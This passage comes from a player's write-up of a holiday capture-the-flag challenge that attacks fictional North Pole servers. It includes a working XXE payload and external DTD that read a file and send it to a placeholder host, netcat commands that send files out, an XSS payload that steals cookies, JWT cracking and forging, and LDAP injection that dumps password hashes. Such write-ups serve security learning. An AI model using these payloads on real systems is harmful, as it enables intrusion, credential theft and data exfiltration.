Then I looked at the response and saw /account.html. I typed in 10.142.0.5/account.html and was logged into alabaster.snowball’s account. I found that I could log into other accounts using the same method as well, changing the user account to whatever user I wanted to be. In alabaster.snowball’s account, I found hints to get access to the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail containing the words gingerbread, cookie, or recipe. Minty Candycane sent Alabaster Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept found here: http://mail.northpolechristmastown.com/attachments/dde_exmaple_minty_candycane.png
Changing the cookie. |
Minty Candycane DDE Example |
I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, I used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.
Logging onto the EAAS server, there is an area to submit requests to build elves using XML.
EAAS Web Site |
Click on the Elf Checking Service to exploit this web site.
Not always Upload Capability that is vulnerable, but when it is.... |
This particular site is vulnerable to an XML External Entity (XXE) attack. The attack detailed here works: https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the DTD that I submitted to the EAAS server:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd">
%extentity;
%inception;
%sendit;
]>
Below is the DTD file that I put on the server I use to test vulnerabilities with:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://x.x.x.x:6667/?%dataismine;'>">
Upload DTD XXE Exploit that borrows a file... |
I used the python module SimpleHTTPServer to serve sweets.dtd so I didn’t have to serve a full website. I made sure I was in a directory I wasn’t afraid for people to see the files in, considering that SimpleHTTPServer serves the current directory by default.
python -m SimpleHTTPServer 6666
Then I had a netcat listener running to catch greatbook.txt:
nc -nvlp 6667 > greatbook.txt
Serving Sweets on my borrowing Server |
Great Book Page! |
EMI Server
I wasn’t successful obtaining this file. I tried phishing Alabaster Snowball using the hints detailed above in the Mail Server section. The hints for this one were given by Shinny Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to me once or twice, and the same payload would not work another time. I tried the proof of concept that Minty Candycane submitted. I tried turning it around and using (New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing the traffic on my server to test connectivity. I tried using nc to send the file to myself as nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload the file onto the SMB share owned by the elves, or one of the other servers owned by the elves, since I have access to them. I tried to offload the file to the l2s server since I could break out of rbash on it. I found the IP for the l2s server by doing:
/bin/netstat -n
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is JavaScript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
On my server, I had a PHP program that logs the cookie, found here:
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in-php-get-via-email.html
I served it using PHP's built-in development web server (php -S, capital S):
sudo php -S 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forge a new token.
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
I used the secret to forge a token with py-jwt.
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
I just got into the edb/ldap server the night the challenge was due, so I didn't finish getting that flag. The hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this one is running LDAP, hence the reason I know it's the LDAP one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Dev Listing |
LDAP LDIF Template |
Update: Well, that didn't take long. I'm holding off on reading write-ups until I solve these. It paid off. I returned all the records after reading this post on the SANS Pen Testing blog.
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
EDB Find Elves Source Code |
So basically what happens is the radio button on the web page has to be checked for the variable "isElf" to be true, else "isElf" is false. If "isElf" from the request form is not equal to true, then isElf is set to reindeer. If "isElf" from the request form is equal to true, then isElf is set to elf. These represent the ou in LDAP. So I did this query and it returned Rudolph. I was wondering how it returned Rudolph. Look about two sentences ago: if isElf is false then ou = reindeer. That is how Rudolph was returned. Duh to me. Then I noticed the scrollbar at the bottom.
Returning Everyone's Records |
So how did everyone else's records return? I honestly have no idea how this worked. I will have to study it more. But, I changed the attributes as described in the article like so:
Changing HTML to get Password Hashes |
It returned everyone's password hashes as well. Nice!
Santa's Password Hash! |
Either crack it or try Google because it's an MD5 hash.
Santa's Cracked Password |
Log out and attempt to log in as Santa Claus...
Entering Password for Santa Panel |
Letter From The Wizard! |
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions in the database, which can then be used to determine how many infractions it takes to be placed on the naughty list. It could potentially be used to see who the moles are as well.